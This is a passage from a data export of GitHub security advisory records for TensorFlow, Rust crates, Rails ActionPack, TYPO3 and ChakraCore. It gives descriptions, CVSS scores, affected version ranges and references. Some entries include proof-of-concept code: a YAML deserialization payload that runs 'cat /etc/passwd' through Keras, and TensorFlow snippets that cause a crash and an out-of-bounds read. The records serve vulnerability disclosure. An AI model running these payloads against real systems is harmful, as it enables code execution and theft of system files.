'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'array-queue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'last_affected': '0.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35900'}, {'type': 'WEB', 'url': 'https://github.com/raviqqe/array-queue/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/raviqqe/array-queue'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0047.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T19:46:12Z', 'nvd_published_at': None}" +1.4.0,GHSA-r6jx-9g48-2r5r,2021-08-24T16:15:38Z,2021-08-25T14:41:12Z,,['CVE-2021-37678'],Arbitrary code execution due to YAML deserialization,"### Impact +TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. + +```python +from tensorflow.keras import models + +payload = ''' +!!python/object/new:type +args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] +listitems: ""__import__('os').system('cat /etc/passwd')"" +''' + +models.model_from_yaml(payload) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. + +### Patches +Given that YAML format support requires a significant amount of work, we have removed it for now. + +We have patched the issue in GitHub commit [23d6383eb6c14084a8fc3bdf164043b974818012](https://github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Arjun Shibu.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ecosystem_specific': {'affected_functions': ['tensorflow.keras.Model.to_yaml', 'tensorflow.keras.models.model_from_yaml']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37678'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1df5a69e9f1a18a937e7907223066e606bf466b9'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8e47a685785bef8f81bcb996048921dfde08a9ab'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a09ab4e77afdcc6e1e045c9d41d5edab63aafc1a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:15:38Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-xxfr-jrgh-x392,2021-05-04T22:11:30Z,2021-08-02T17:29:01Z,,['CVE-2020-1172'],Remote code execution in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1180.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1172'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6500'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1172'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:11:30Z', 'nvd_published_at': '2020-09-11T17:15:00Z'}" +1.4.0,GHSA-jf43-3v8j-qwwr,2023-06-13T20:04:37Z,2021-08-25T20:59:56Z,,[],Data races in multiqueue,"Affected versions of multiqueue unconditionally implemented `Send` for types used in queue implementations (`InnerSend`, `InnerRecv`, `FutInnerSend`, `FutInnerRecv`). This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'multiqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/schets/multiqueue/issues/31'}, {'type': 'PACKAGE', 'url': 'https://github.com/schets/multiqueue'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0143.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:20:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-v5r6-6r3c-wqxc,2021-08-19T21:22:28Z,2021-08-25T20:44:56Z,,['CVE-2019-15549'],Memory exhaustion in asn1_der,An issue was discovered in the asn1_der crate before 0.6.2 for Rust. Attackers can trigger memory exhaustion by supplying a large value in a length field.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'asn1_der'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15549'}, {'type': 'WEB', 'url': 'https://github.com/KizzyCode/asn1_der/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/KizzyCode/asn1_der'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0007.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:28Z', 'nvd_published_at': None}" +1.4.0,GHSA-278g-rq84-9hmg,2021-08-24T15:39:40Z,2021-08-25T14:41:36Z,,['CVE-2021-37673'],`CHECK`-fail in `MapStage`,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.MapStage`: + +```python +import tensorflow as tf + +tf.raw_ops.MapStage( + key=tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), + indices=tf.constant((0), dtype=tf.int32), + values=[tf.constant((0), dtype=tf.int32)], + dtypes=[tf.int32, + tf.int64], + capacity=0, + memory_limit=0, + container='', + shared_name='') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/map_stage_op.cc#L513) does not check that the `key` input is a valid non-empty tensor. + +### Patches +We have patched the issue in GitHub commit [d7de67733925de196ec8863a33445b73f9562d1d](https://github.com/tensorflow/tensorflow/commit/d7de67733925de196ec8863a33445b73f9562d1d). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-278g-rq84-9hmg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37673'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d7de67733925de196ec8863a33445b73f9562d1d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:34:22Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-9697-98pf-4rw7,2021-08-24T14:24:19Z,2021-08-25T14:41:44Z,,['CVE-2021-37670'],Heap OOB in `UpperBound` and `LowerBound`,"### Impact +An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `tf.raw_ops.UpperBound`: + +```python +import tensorflow as tf + +tf.raw_ops.UpperBound( + sorted_input=[1,2,3], + values=tf.constant(value=[[0,0,0],[1,1,1],[2,2,2]],dtype=tf.int64), + out_type=tf.int64) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/searchsorted_op.cc#L85-L104) does not validate the rank of `sorted_input` argument: + +```cc + void Compute(OpKernelContext* ctx) override { + const Tensor& sorted_inputs_t = ctx->input(0); + // ... + OP_REQUIRES(ctx, sorted_inputs_t.dim_size(0) == values_t.dim_size(0), + Status(error::INVALID_ARGUMENT, + ""Leading dim_size of both tensors must match."")); + // ... + if (output_t->dtype() == DT_INT32) { + OP_REQUIRES(ctx, + FastBoundsCheck(sorted_inputs_t.dim_size(1), ...)); + // ... + } +``` + +As we access the first two dimensions of `sorted_inputs_t` tensor, it must have rank at least 2. + +A similar issue occurs in `tf.raw_ops.LowerBound`. + +### Patches +We have patched the issue in GitHub commit [42459e4273c2e47a3232cc16c4f4fff3b3a35c38](https://github.com/tensorflow/tensorflow/commit/42459e4273c2e47a3232cc16c4f4fff3b3a35c38). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9697-98pf-4rw7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37670'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/42459e4273c2e47a3232cc16c4f4fff3b3a35c38'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:24:19Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-h3qr-rq2j-74w4,2023-06-13T17:40:10Z,2021-08-25T20:46:08Z,,['CVE-2020-35863'],HTTP Request Smuggling in hyper,"Vulnerable versions of hyper allow GET requests to have bodies, even if there is no Transfer-Encoding or Content-Length header. As per the HTTP 1.1 specification, such requests do not have bodies, so the body will be interpreted as a separate HTTP request. + +This allows an attacker who can control the body and method of an HTTP request made by hyper to inject a request with headers that would not otherwise be allowed, as demonstrated by sending a malformed HTTP request from a Substrate runtime. This allows bypassing CORS restrictions. In combination with other vulnerabilities, such as an exploitable web server listening on loopback, it may allow remote code execution. + +The flaw was corrected in hyper version 0.12.34.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.12.34'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35863'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/issues/1925'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0008.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-2rqw-v265-jf8c,2023-07-03T22:56:34Z,2021-08-26T20:36:51Z,,['CVE-2021-22942'],Open Redirect in ActionPack,"# Overview + +There is a possible open redirect vulnerability in the Host Authorization +middleware in Action Pack. This vulnerability has been assigned the CVE +identifier CVE-2021-22942. + +Versions Affected: >= 6.0.0. +Not affected: < 6.0.0 +Fixed Versions: 6.1.4.1, 6.0.4.1 + +# Impact + +Specially crafted “X-Forwarded-Host” headers in combination with certain +“allowed host” formats can cause the Host Authorization middleware in +Action Pack to redirect users to a malicious website. + +Impacted applications will have allowed hosts with a leading dot. +For example, configuration files that look like this: + +```ruby +config.hosts << '.EXAMPLE.com' +``` + +When an allowed host contains a leading dot, a specially crafted +Host header can be used to redirect to a malicious website. + +This vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not +take in to account domain name case sensitivity. + +# Releases + +The fixed releases are available at the normal locations. + +# Workarounds + +In the case a patch can’t be applied, the following monkey patch can be +used in an initializer: + +```ruby +module ActionDispatch + class HostAuthorization + HOSTNAME = /[a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9.:]+\]/i + VALID_ORIGIN_HOST = /\A(#{HOSTNAME})(?::\d+)?\z/ + VALID_FORWARDED_HOST = /(?:\A|,[ ]?)(#{HOSTNAME})(?::\d+)?\z/ + + private + def authorized?(request) + origin_host = + request.get_header(""HTTP_HOST"")&.slice(VALID_ORIGIN_HOST, 1) || """" + forwarded_host = + request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || """" + @permissions.allows?(origin_host) && + (forwarded_host.blank? || @permissions.allows?(forwarded_host)) + end + end +end +``` +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.4.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.4'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.4.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22942'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2021-22942'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails/tree/main/actionpack'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22942.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/wB5tRn7h36c'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/actionpack'}, {'type': 'WEB', 'url': 'https://weblog.rubyonrails.org/2021/8/19/Rails-6-0-4-1-and-6-1-4-1-have-been-released/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5372'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/14/5'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:36:25Z', 'nvd_published_at': '2021-10-18T13:15:00Z'}" +1.4.0,GHSA-rjh8-p66p-jrh5,2021-08-19T21:18:47Z,2021-08-25T20:46:59Z,,['CVE-2020-35871'],Data races in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via an Auxdata API data race.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35871'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/2ef3628dac35aeba0a97d5fb3a57746b4e1d62b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:47Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-c5c9-8c6m-727v,2021-10-21T13:56:39Z,2021-08-19T15:53:12Z,,['CVE-2021-32768'],Cross-Site Scripting via Rich-Text Content,"> ### Meta +> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC` (5.7) + +### Problem +Failing to properly parse, sanitize and encode malicious rich-text content, the content rendering process in the website frontend is vulnerable to cross-site scripting. Corresponding rendering instructions via TypoScript functionality _[HTMLparser](https://docs.typo3.org/m/typo3/reference-typoscript/10.4/en-us/Functions/Htmlparser.html)_ do not consider all potentially malicious HTML tag & attribute combinations per default. + +In addition, the lack of comprehensive default node configuration for rich-text fields in the backend user interface fosters this malfunction. + +In default scenarios, a valid backend user account is needed to exploit this vulnerability. In case custom plugins used in the website frontend accept and reflect rich-text content submitted by users, no authentication is required. + +### Solution +Update to TYPO3 versions 7.6.53 ELTS, 8.7.42 ELTS, 9.5.29, 10.4.19, 11.3.2 that fix the problem described above. + +Custom package _[typo3/html-sanitizer](https://github.com/TYPO3/html-sanitizer)_ - based on allow-lists only - takes care of sanitizing potentially malicious markup. The default behavior is based on safe and commonly used markup - however, this can be extended or restricted further in case it is necessary for individual scenarios. + +During the frontend rendering process, sanitization is applied to the default TypoScript path `lib.parseFunc`, which is implicitly used by the Fluid view-helper instruction `f:format.html`. Rich-text data persisted using the backend user interface is sanitized as well. Implementation details are explained in corresponding [ChangeLog documentation](https://docs.typo3.org/c/typo3/cms-core/master/en-us/Changelog/9.5.x/Important-94484-IntroduceHTMLSanitizer.html). + +### Credits +Thanks to Benjamin Stiber, Gert-Jan Jansma, Gábor Ács-Kurucz, Alexander Kellner, Richie Lee, Nina Rösch who reported this issue, and to TYPO3 security team member Oliver Hader, as well as TYPO3 contributor Susanne Moog who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-013](https://typo3.org/security/advisory/typo3-core-sa-2021-013)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.53'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.6.52'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.42'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.41'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.29'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.28'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.18'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.3.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-c5c9-8c6m-727v'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-c5c9-8c6m-727v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32768'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-013'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-16T22:38:47Z', 'nvd_published_at': '2021-08-10T17:15:00Z'}" +1.4.0,GHSA-jpwg-6gf5-5vh9,2023-06-13T20:49:19Z,2021-08-25T20:54:10Z,,['CVE-2021-29942'],Out of bounds write in reorder,"swap_index takes an iterator and swaps the items with their corresponding indexes. It reserves capacity and sets the length of the vector based on the .len() method of the iterator. + +If the len() returned by the iterator is larger than the actual number of elements yielded, then swap_index creates a vector containing uninitialized members. If the len() returned by the iterator is smaller than the actual number of members yielded, then swap_index can write out of bounds past its allocated vector. + +As noted by the Rust documentation, len() and size_hint() are primarily meant for optimization and incorrect values from their implementations should not lead to memory safety violations. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'reorder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29942'}, {'type': 'WEB', 'url': 'https://github.com/tiby312/reorder/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/tiby312/reorder'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0050.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:17:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-hqc8-j86x-2764,2021-08-19T21:06:47Z,2021-08-25T20:48:33Z,,['CVE-2020-35893'],Off-by-one error in simple-slab,"An issue was discovered in the 